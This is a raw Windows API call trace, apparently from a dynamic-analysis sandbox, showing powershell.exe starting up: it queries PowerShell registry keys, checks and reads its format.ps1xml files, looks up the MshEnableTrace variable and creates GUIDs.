	[0425.377] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.377] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d908 | out: phkResult=0x18d908*=0x1bc) returned 0x0
	[0425.377] RegQueryValueExW (in: hKey=0x1bc, lpValueName="path", lpReserved=0x0, lpType=0x18d91c, lpData=0x0, lpcbData=0x18d918*=0x0 | out: lpType=0x18d91c*=0x1, lpData=0x0, lpcbData=0x18d918*=0x74) returned 0x0
	[0425.377] RegQueryValueExW (in: hKey=0x1bc, lpValueName="path", lpReserved=0x0, lpType=0x18d88c, lpData=0x0, lpcbData=0x18d888*=0x0 | out: lpType=0x18d88c*=0x1, lpData=0x0, lpcbData=0x18d888*=0x74) returned 0x0
	[0425.377] CoTaskMemAlloc (cb=0x78) returned 0x2359d0
	[0425.377] RegQueryValueExW (in: hKey=0x1bc, lpValueName="path", lpReserved=0x0, lpType=0x18d85c, lpData=0x2359d0, lpcbData=0x18d858*=0x74 | out: lpType=0x18d85c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x18d858*=0x74) returned 0x0
	[0425.378] CoTaskMemFree (pv=0x2359d0) 
	[0425.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x18d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0425.378] SetErrorMode (uMode=0x1) returned 0x1
	[0425.378] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x18d7e0 | out: lpFileInformation=0x18d7e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0425.378] SetErrorMode (uMode=0x1) returned 0x1
	[0425.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0425.379] SetErrorMode (uMode=0x1) returned 0x1
	[0425.379] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d7e0 | out: lpFileInformation=0x18d7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0425.379] SetErrorMode (uMode=0x1) returned 0x1
	[0425.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0425.379] SetErrorMode (uMode=0x1) returned 0x1
	[0425.379] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d7e0 | out: lpFileInformation=0x18d7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0425.380] SetErrorMode (uMode=0x1) returned 0x1
	[0425.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0425.380] SetErrorMode (uMode=0x1) returned 0x1
	[0425.380] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d7e0 | out: lpFileInformation=0x18d7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0425.380] SetErrorMode (uMode=0x1) returned 0x1
	[0425.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0425.380] SetErrorMode (uMode=0x1) returned 0x1
	[0425.380] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d7e0 | out: lpFileInformation=0x18d7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0425.380] SetErrorMode (uMode=0x1) returned 0x1
	[0425.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0425.380] SetErrorMode (uMode=0x1) returned 0x1
	[0425.380] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d7e0 | out: lpFileInformation=0x18d7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0425.380] SetErrorMode (uMode=0x1) returned 0x1
	[0425.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0425.381] SetErrorMode (uMode=0x1) returned 0x1
	[0425.381] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d7e0 | out: lpFileInformation=0x18d7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0425.381] SetErrorMode (uMode=0x1) returned 0x1
	[0425.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0425.381] SetErrorMode (uMode=0x1) returned 0x1
	[0425.381] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d7e0 | out: lpFileInformation=0x18d7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0425.381] SetErrorMode (uMode=0x1) returned 0x1
	[0425.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0425.381] SetErrorMode (uMode=0x1) returned 0x1
	[0425.381] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d7e0 | out: lpFileInformation=0x18d7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0425.381] SetErrorMode (uMode=0x1) returned 0x1
	[0425.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0425.382] SetErrorMode (uMode=0x1) returned 0x1
	[0425.382] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d7e0 | out: lpFileInformation=0x18d7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0425.382] SetErrorMode (uMode=0x1) returned 0x1
	[0425.383] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0425.383] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.383] CoTaskMemFree (pv=0x290840) 
	[0425.385] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0425.385] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.385] CoTaskMemFree (pv=0x290840) 
	[0425.385] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0425.385] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.386] CoTaskMemFree (pv=0x290840) 
	[0425.386] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0425.386] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.386] CoTaskMemFree (pv=0x290840) 
	[0425.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0425.386] SetErrorMode (uMode=0x1) returned 0x1
	[0425.386] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c4
	[0425.387] GetFileType (hFile=0x1c4) returned 0x1
	[0425.387] SetErrorMode (uMode=0x1) returned 0x1
	[0425.387] GetFileType (hFile=0x1c4) returned 0x1
	[0425.387] ReadFile (in: hFile=0x1c4, lpBuffer=0x33bf580, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x33bf580*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0425.388] ReadFile (in: hFile=0x1c4, lpBuffer=0x33bf580, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x33bf580*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0425.389] ReadFile (in: hFile=0x1c4, lpBuffer=0x33bf580, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x33bf580*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0425.389] ReadFile (in: hFile=0x1c4, lpBuffer=0x33bf580, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x33bf580*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0425.389] ReadFile (in: hFile=0x1c4, lpBuffer=0x33bf580, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x33bf580*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0425.390] ReadFile (in: hFile=0x1c4, lpBuffer=0x33bf580, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x33bf580*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0425.390] ReadFile (in: hFile=0x1c4, lpBuffer=0x33bf580, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x33bf580*, lpNumberOfBytesRead=0x18d478*=0x9e2, lpOverlapped=0x0) returned 1
	[0425.390] ReadFile (in: hFile=0x1c4, lpBuffer=0x33beaca, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x33beaca*, lpNumberOfBytesRead=0x18d478*=0x0, lpOverlapped=0x0) returned 1
	[0425.390] ReadFile (in: hFile=0x1c4, lpBuffer=0x33bf580, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x33bf580*, lpNumberOfBytesRead=0x18d478*=0x0, lpOverlapped=0x0) returned 1
	[0425.390] CloseHandle (hObject=0x1c4) returned 1
	[0425.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0425.390] SetErrorMode (uMode=0x1) returned 0x1
	[0425.390] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d420 | out: lpFileInformation=0x18d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0425.390] SetErrorMode (uMode=0x1) returned 0x1
	[0425.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0425.391] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d508 | out: phkResult=0x18d508*=0x1c4) returned 0x0
	[0425.391] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d48c, lpData=0x0, lpcbData=0x18d488*=0x0 | out: lpType=0x18d48c*=0x1, lpData=0x0, lpcbData=0x18d488*=0x56) returned 0x0
	[0425.391] CoTaskMemAlloc (cb=0x5a) returned 0x1b349950
	[0425.391] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d45c, lpData=0x1b349950, lpcbData=0x18d458*=0x56 | out: lpType=0x18d45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d458*=0x56) returned 0x0
	[0425.391] CoTaskMemFree (pv=0x1b349950) 
	[0425.391] RegCloseKey (hKey=0x1c4) returned 0x0
	[0425.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0425.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0425.398] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xe221de85, Data2=0xf305, Data3=0x4b4d, Data4=([0]=0x98, [1]=0x1b, [2]=0x84, [3]=0x1, [4]=0xc9, [5]=0xf7, [6]=0xaf, [7]=0xa9))) returned 0x0
	[0425.675] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x9b67d9cc, Data2=0xf418, Data3=0x4186, Data4=([0]=0xae, [1]=0x97, [2]=0xdf, [3]=0x49, [4]=0x30, [5]=0x17, [6]=0x8f, [7]=0xa))) returned 0x0
	[0425.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0425.676] SetErrorMode (uMode=0x1) returned 0x1
	[0425.676] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c4
	[0425.676] GetFileType (hFile=0x1c4) returned 0x1
	[0425.676] SetErrorMode (uMode=0x1) returned 0x1
	[0425.676] GetFileType (hFile=0x1c4) returned 0x1
	[0425.676] ReadFile (in: hFile=0x1c4, lpBuffer=0x33ea0e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x33ea0e8*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0425.677] ReadFile (in: hFile=0x1c4, lpBuffer=0x33ea0e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x33ea0e8*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0425.677] ReadFile (in: hFile=0x1c4, lpBuffer=0x33ea0e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x33ea0e8*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0425.678] ReadFile (in: hFile=0x1c4, lpBuffer=0x33ea0e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x33ea0e8*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0425.678] ReadFile (in: hFile=0x1c4, lpBuffer=0x33ea0e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x33ea0e8*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0425.678] ReadFile (in: hFile=0x1c4, lpBuffer=0x33ea0e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x33ea0e8*, lpNumberOfBytesRead=0x18d478*=0xfb2, lpOverlapped=0x0) returned 1
	[0425.678] ReadFile (in: hFile=0x1c4, lpBuffer=0x33e9802, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x33e9802*, lpNumberOfBytesRead=0x18d478*=0x0, lpOverlapped=0x0) returned 1
	[0425.679] ReadFile (in: hFile=0x1c4, lpBuffer=0x33ea0e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x33ea0e8*, lpNumberOfBytesRead=0x18d478*=0x0, lpOverlapped=0x0) returned 1
	[0425.679] CloseHandle (hObject=0x1c4) returned 1
	[0425.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0425.679] SetErrorMode (uMode=0x1) returned 0x1
	[0425.679] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d420 | out: lpFileInformation=0x18d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0425.679] SetErrorMode (uMode=0x1) returned 0x1
	[0425.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0425.679] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d508 | out: phkResult=0x18d508*=0x1c4) returned 0x0
	[0425.679] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d48c, lpData=0x0, lpcbData=0x18d488*=0x0 | out: lpType=0x18d48c*=0x1, lpData=0x0, lpcbData=0x18d488*=0x56) returned 0x0
	[0425.679] CoTaskMemAlloc (cb=0x5a) returned 0x1b349950
	[0425.679] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d45c, lpData=0x1b349950, lpcbData=0x18d458*=0x56 | out: lpType=0x18d45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d458*=0x56) returned 0x0
	[0425.679] CoTaskMemFree (pv=0x1b349950) 
	[0425.679] RegCloseKey (hKey=0x1c4) returned 0x0
	[0425.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0425.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0425.681] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x6755e691, Data2=0x245, Data3=0x43ff, Data4=([0]=0x8a, [1]=0x2f, [2]=0xc6, [3]=0xf1, [4]=0x61, [5]=0x45, [6]=0x4e, [7]=0x63))) returned 0x0
